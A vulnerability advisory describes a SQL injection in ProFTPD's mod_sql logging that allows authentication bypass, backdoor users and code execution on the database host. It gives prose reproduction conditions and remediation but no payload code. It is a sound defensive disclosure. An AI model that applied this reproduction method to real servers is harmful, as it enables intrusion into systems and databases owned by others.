ProFTPD mod_sql SQL Injection Vulnerability Allowing Authentication Bypass, Privilege Escalation, and Remote Code Execution

A SQL injection vulnerability has been identified in ProFTPD versions prior to 1.3.10rc1, specifically within the mod_sql module. This vulnerability allows remote attackers to execute arbitrary SQL commands by exploiting a flaw in the SQL logging mechanism. The issue arises when the 'USER' request logging includes attacker-controlled variables, such as the username, and the SQL backend permits certain commands. Attackers can leverage this vulnerability to inject backdoor users into the FTP authentication database or execute arbitrary code on the database host, particularly with PostgreSQL or SQLite backends that support stacked queries.

Impact

Exploitation of this vulnerability leads to SQL injection, allowing for authentication bypass, privilege escalation, and remote code execution on the database host.

Reproduction

The vulnerability can be reproduced by configuring ProFTPD to log 'USER' requests with an SQL query that includes unescaped, attacker-controlled variables. This can be done by setting up a 'SQLNamedQuery' that interpolates variables like '%U' (the original username) into the query. Once this is in place, sending a 'USER' command with a crafted username that exploits the SQL injection flaw will trigger the vulnerability. This can be automated with a proof-of-concept script available in the 'proftpd-CVE-2026-42167-poc' GitHub repository.

Remediation

Users are advised to upgrade to ProFTPD version 1.3.10 or later. For those unable to upgrade immediately, a temporary measure can be implemented by using a 'mod_rewrite' configuration to filter out 'USER' names containing suspicious characters.